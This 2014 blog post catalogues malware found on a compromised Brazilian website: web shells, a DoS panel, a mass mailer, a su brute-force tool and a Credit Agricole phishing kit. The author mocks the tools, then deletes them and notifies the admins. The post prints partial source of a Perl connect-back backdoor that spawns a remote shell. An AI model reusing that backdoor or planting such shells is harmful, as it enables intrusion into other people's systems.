Monday, January 13, 2014

construtorassm.com.br - shells and DoS and phishing, oh my

construtorassm.com.br
177.87.155.43

Started with a WSO shell. Cracked into it.

Find all sorts of hideous junk on here, including a Credit Agricole (French Bank) phishing kit.
WSO shell
ICH Th3 Unkn0wn MySQL interface
Priv8 shell
Symlink Sa 2 panel
Dangerous Mailer
VNShell DDoS shell
K2LL33d shell
turkblackhats.com shell
1923Turk.com mod b374k shell,
RootDaBitch tool - brute force local accounts using su
CA.zip - Credit Agricole kit


Ok, lets have a look.

WSO 
(this was something like the 3rd WSO I found in here...seriously??)



MySQL Interface mod



Priv8 Shell
It literally tells me the password to the shell is 'priv8'

..and the password works. What an ugly piece of garbage too!



Symlink Panel
Symlink shared hosting directories to one place and mass deface.

Domains list, but symlinks arent working. Sorry buddy.
This thing stopped being useful a while ago.


Dangerous Mailer
Login to mailer panel.

Long view of Dangerous Mailer


VNShell Flooder
(because DoS is hacking)
This is the type of stuff they teach you at HackForums.
Oh yeah, and this isn't even a shell even though its called a shell.

Select the attack type

Target, http file, attack time



K2LL33d
Does it look like b374k shell (below)? 
Yes, thats because this skilled hacker just changed a few lines of code and called it his own work. 
v3ry sw33t


If your eyes aren't already bleeding, get a load of this.


TurkBlackhats Shell


b374k shell (1923Turk)
Yawn.


RootDaBitch
This tool brute forces su to gain elevated privileges, uses suCrack.

Directory listing of the kit, showing Bash script, password txt and screenshots?
Why?



Oh yes, because I don't know how to run a bash script, nor would there be useful info in the script source code either...sigh.

Not one, but two screenshots!
This one proves that he got in !! Wow cool. Fuck you.
Thanks "The Breacher" that was really helpful to me and my fellow skids. 


(Shake my head)

More things that are not that interesting and pretty useless but someone decided to spend time working on anyway:


PHP mailer, no panel, post method
<?php
/*Variaveis do Formulario*/
$nome = trim(@$_POST['nome']);/*recebe os dados digitados no campo "nome"*/
$email = trim(@$_POST['email']);/*recebe os dados digitados no campo "email"*/
$assunto_user = trim(@$_POST['assunto']);/*recebe os dados digitados no campo "assunto"*/
$mensagem = trim(@$_POST['mensagem']);/*recebe os dados digitados no campo "mensagem"*/
[...redacted]

Perl back connect
#!/usr/bin/perl      use Socket;      print "Data Cha0s Connect Back Backdoor\n\n";      if (!$ARGV[0]) {        printf "Usage: $0 [Host] <Port>\n";        exit(1);      }      print "[*] Dumping Arguments\n";      $host = $ARGV[0];      $port = 80;      if ($ARGV[1]) {        $port = $ARGV[1];      }      print "[*] Connecting...\n";      $proto = getprotobyname('tcp') || die("Unknown Protocol\n");      [...redacted]        die("Unable to Connect\n");      }      print "[*] Spawning Shell\n";      if (!fork( )) {        [...redatcted]        exec {'/bin/sh'} '-bash' . "\0" x 4;        exit(0);      }      print "[*] Datached\n\n";



Last but not least.

Credit Agricole phishing kit - CA.zip
Includes js, php, images, etc. for phishing site.
Bad guys redirect victim traffic to a kit like this in an effort to steal login credentials.
Crédit Agricole S.A. is the largest retail banking group in France, second largest in Europe and the eighth largest in the world by Tier 1 capital according to The Banker magazine. -Wikipedia.com 
Phishing pages:







I deleted all of this junk. All the shells, phishing pages, mailers, DoS 'shell'.. all of it.  I emailed the admins too. operacional[at]rapidoacesso.com.br


No comments:

Post a Comment